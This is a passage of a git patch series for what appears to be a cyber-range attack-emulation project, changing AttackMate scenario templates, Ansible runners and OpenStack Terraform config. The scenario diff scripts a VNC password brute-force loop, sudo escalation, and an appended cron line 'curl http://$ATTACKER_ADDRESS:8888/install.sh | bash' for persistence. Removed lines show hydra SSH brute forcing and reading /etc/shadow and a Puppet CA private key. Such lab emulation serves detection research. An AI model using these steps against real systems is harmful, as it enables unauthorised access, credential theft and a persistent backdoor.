b/terragrunt/videoserver/module/adminpc.tf index c83872f..6baff51 100644 --- a/terragrunt/videoserver/module/adminpc.tf +++ b/terragrunt/videoserver/module/adminpc.tf @@ -11,7 +11,7 @@ data "external" "lan_uuid" { program = ["bash", "./fetch_network_uuid.sh"] query = { - network_name = "lan" + network_name = "admin" } } From b22a38404f090ea6fed0fd2d63ba4ecfad1161df Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Wed, 26 Feb 2025 16:12:02 +0100 Subject: [PATCH 09/12] add bruteforcing vnc --- .../run/scenario3/templates/scenario_3_a_b.j2 | 138 +++++++++--------- 1 file changed, 68 insertions(+), 70 deletions(-) 
diff --git a/ansible/run/scenario3/templates/scenario_3_a_b.j2 b/ansible/run/scenario3/templates/scenario_3_a_b.j2 index 7cb51dd..4bad312 100644 --- a/ansible/run/scenario3/templates/scenario_3_a_b.j2 +++ b/ansible/run/scenario3/templates/scenario_3_a_b.j2 
@@ -1,68 +1,91 @@ #################### # -# Scenario 3 a a +# Scenario 3 a b # #################### + vars: $SERVER_ADDRESS: 192.42.0.254 $ATTACKER_ADDRESS: 192.42.1.174 $DNS_SERVER: 192.42.0.233 - + $LISTA: + - "password1" + - "password2" + - "password3" + - "password4" + - "password5" + - "123" + - "12345" + - "12345678" + commands: - - type: shell - cmd: hydra -C user_pass_combo.txt -s 10022 $SERVER_ADDRESS ssh - - - type: ssh - creates_session: foothold - username: john - password: rambo - hostname: $SERVER_ADDRESS - port: 10022 - cmd: id - - - type: ssh + - type: loop + break_if: $RESULT_STDOUT =~ vnc_connected + cmd: "items(LISTA)" + commands: + - type: vnc + creates_session: foothold + username: john + password: $LOOP_ITEM + hostname: $SERVER_ADDRESS + port: "5901" + cmd: move + x: 5 + y: 5 + + - type: vnc session: foothold - cmd: "tcpdump -A port 21\n" - interactive: True - + cmd: click - type: sleep - seconds: 20 + seconds: 3 - - type: ssh + - type: vnc session: foothold - cmd: "03" - interactive: True - bin: True + cmd: type + input: "terminal" - - type: ssh - session: foothold - cmd: "sudo -i\n" - interactive: True + - type: sleep + seconds: 3 - - type: ssh + - type: vnc session: foothold - cmd: "rambo\n" - interactive: True + cmd: key + key: "enter" + + - type: sleep + seconds: 3 - - type: ssh + - type: vnc session: foothold - cmd: "id\n" - interactive: True + cmd: type + input: "sudo -i" - - type: ssh + - type: sleep + seconds: 3 + + - type: vnc session: foothold - cmd: "cat /etc/shadow\n" - interactive: True + cmd: key + key: "enter" + + - type: sleep + seconds: 2 - - type: ssh + - type: vnc session: foothold - cmd: "cat /etc/puppetlabs/puppetserver/ca/ca_key.pem\n" - interactive: True + cmd: type + input: echo "curl http://$ATTACKER_ADDRESS:8888/install.sh | bash" >> /media/share/healthcheck_cron.sh + + - type: sleep + seconds: 2 - - type: ssh + - type: vnc session: foothold - cmd: "cat /media/share/healthcheck_cron.sh\n" - interactive: True + cmd: 
key + key: "enter" + + - type: sleep + seconds: 1 - type: mktemp cmd: file @@ -91,37 +114,11 @@ commands: background: True kill_on_exit: true - - type: ssh - session: foothold - cmd: "vim /media/share/healthcheck_cron.sh\n" - interactive: True - - - type: ssh - session: foothold - cmd: "G" - interactive: True - - - type: ssh + - type: vnc + cmd: close session: foothold - cmd: "o" - interactive: True - - type: ssh - session: foothold - cmd: "curl http://$ATTACKER_ADDRESS:8888/install.sh | bash\n" - interactive: True - - - type: ssh - session: foothold - cmd: "1B" - interactive: True - bin: True - - - type: ssh - session: foothold - cmd: ":wq\n" - interactive: True -################### MOVED ############################################ +#################### MOVED ############################################ - type: msf-session session: movement cmd: sysinfo @@ -173,3 +170,4 @@ commands: - type: msf-session session: movement cmd: systemctl stop exim4.service + From 29e8af9b2fcb85b3f288a2402306aeb598d03730 Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Wed, 26 Feb 2025 16:12:27 +0100 Subject: [PATCH 10/12] fetch uuid script --- terragrunt/fetch_network_uuid.sh | 0 1 file changed, 0 insertions(+), 0 deletions(-) mode change 100644 => 100755 terragrunt/fetch_network_uuid.sh diff --git a/terragrunt/fetch_network_uuid.sh b/terragrunt/fetch_network_uuid.sh old mode 100644 new mode 100755 From 3d963320ccc41951d3c63ae5429afb53855e3b59 Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Wed, 26 Feb 2025 16:14:29 +0100 Subject: [PATCH 11/12] remove comments --- ansible/run/scenario3/main.yml | 94 +++++++++++++++++----------------- 1 file changed, 47 insertions(+), 47 deletions(-) diff --git a/ansible/run/scenario3/main.yml b/ansible/run/scenario3/main.yml index 11c180f..7c9faeb 100644 --- a/ansible/run/scenario3/main.yml +++ b/ansible/run/scenario3/main.yml 
@@ -50,18 +50,18 @@ - install - playbooks - # - name: "Run Scenario 3 a a" - # become: True - # become_user: "{{attacker_user}}" - # ansible.builtin.shell: - # cmd: "/usr/local/bin/attackmate-tmux scenario_3_a_a.yml" - # chdir: "{{user_home.stdout}}" - # tags: - # - scenario_3_a_a - # - metasploit - # - attackmate - # - exploit - + - name: "Run Scenario 3 a a" + become: True + become_user: "{{attacker_user}}" + ansible.builtin.shell: + cmd: "/usr/local/bin/attackmate-tmux scenario_3_a_a.yml" + chdir: "{{user_home.stdout}}" + tags: + - scenario_3_a_a + - metasploit + - attackmate + - exploit + - name: "Run Scenario 3 a b" become: True become_user: "{{attacker_user}}" 
@@ -74,39 +74,39 @@ - attackmate - exploit - # - name: "Run Scenario 3 b" - # become: True - # become_user: "{{attacker_user}}" - # ansible.builtin.shell: - # cmd: "/usr/local/bin/attackmate-tmux scenario_3_b.yml" - # chdir: "{{user_home.stdout}}" - # tags: - # - scenario_3_b - # - metasploit - # - attackmate - # - exploit - - # - name: "Run Scenario 3 c" - # become: True - # become_user: "{{attacker_user}}" - # ansible.builtin.shell: - # cmd: "/usr/local/bin/attackmate-tmux scenario_3_c.yml" - # chdir: "{{user_home.stdout}}" - # tags: - # - scenario_3_c - # - metasploit - # - attackmate - # - exploit - - # - name: "Run Scenario 3 d" - # become: True - # become_user: "{{attacker_user}}" - # ansible.builtin.shell: - # cmd: "/usr/local/bin/attackmate-tmux scenario_3_d.yml" - # chdir: "{{user_home.stdout}}" - # tags: - # - scenario_3_d - # - metasploit - # - attackmate - # - exploit + - name: "Run Scenario 3 b" + become: True + become_user: "{{attacker_user}}" + ansible.builtin.shell: + cmd: "/usr/local/bin/attackmate-tmux scenario_3_b.yml" + chdir: "{{user_home.stdout}}" + tags: + - scenario_3_b + - metasploit + - attackmate + - exploit + + - name: "Run Scenario 3 c" + become: True + become_user: "{{attacker_user}}" + ansible.builtin.shell: + cmd: "/usr/local/bin/attackmate-tmux scenario_3_c.yml" + chdir: "{{user_home.stdout}}" + tags: + - scenario_3_c + - metasploit + - attackmate + - exploit + + - name: "Run Scenario 3 d" + become: True + become_user: "{{attacker_user}}" + ansible.builtin.shell: + cmd: "/usr/local/bin/attackmate-tmux scenario_3_d.yml" + chdir: "{{user_home.stdout}}" + tags: + - scenario_3_d + - metasploit + - attackmate + - exploit From 8df3b23d681d317d5a2f06d1a15ef9d4febda568 Mon Sep 17 00:00:00 2001 From: thorinaboenke Date: Wed, 26 Feb 2025 16:19:08 +0100 Subject: [PATCH 12/12] admin network --- terragrunt/videoserver/module/adminpc.tf | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
diff --git a/terragrunt/videoserver/module/adminpc.tf b/terragrunt/videoserver/module/adminpc.tf index 6baff51..b7be984 100644 --- a/terragrunt/videoserver/module/adminpc.tf +++ b/terragrunt/videoserver/module/adminpc.tf @@ -7,7 +7,7 @@ locals { # CREATE INSTANCE for "ADMINPC" # -data "external" "lan_uuid" { +data "external" "admin_uuid" { program = ["bash", "./fetch_network_uuid.sh"] query = { @@ -44,7 +44,7 @@ resource "openstack_compute_instance_v2" "adminpc" { user_data = local.ext_adminpc_userdata_file == null ? null : data.template_cloudinit_config.cloudinitadminpc[0].rendered network { - name = "admin" + uuid = "${data.external.admin_uuid.result.uuid}" fixed_ip_v4 = cidrhost(var.admin_cidr,222) }